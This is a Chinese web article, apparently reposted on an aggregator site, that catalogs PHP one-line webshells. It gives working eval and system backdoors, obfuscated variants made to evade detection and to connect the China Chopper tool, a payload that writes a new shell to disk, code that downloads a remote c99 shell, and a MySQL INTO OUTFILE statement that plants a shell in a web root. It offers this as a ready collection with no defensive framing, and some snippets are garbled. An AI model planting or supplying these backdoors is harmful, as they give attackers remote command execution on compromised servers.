PHP与SQL语句写一句话木马改变
发布时间:2022-07-09 15:26:40 所属栏目:PHP教程 来源:互联网
导读:在本篇文章里小编给大家整理的是关于PHP与SQL语句写一句话木马的相关知识点,有需要的朋友们学习下。 一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来: ?php @eval($_GET[code])? ?php @system($_POST[cmd])? 二、编码的替换的类型:
|
在本篇文章里小编给大家整理的是关于PHP与SQL语句写一句话木马的相关知识点,有需要的朋友们学习下。 一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来: <?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?> 二、编码的替换的类型: session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace(''a'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION['theCode']))','a');?> 三、其他类型: <?php $_GET[a]($_GET[b]);?> //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; <?php assert($_REQUEST["pass"]);?> //菜刀连接 躲避检测 密码pass <?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?> //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass 四、下载类型: <?php echo copy("http://www.phpfensi.com/c99.txt","lostwolf.php"); ?> <? echo file_get_contents("..//cfg_database.php");?> //显示某文件 <? eval ( file_get_contents("远程shell")) ?> //运行远程shell 五、无关键函数类型: <?php <?php ${'_'.$_}['_'](${'_'.$_}['__']);?> http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass <?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?> 六、补充知识点: SQL写一句话(MySQL): select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php" #前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以 (编辑:应用网_丽江站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
浙公网安备 33038102330468号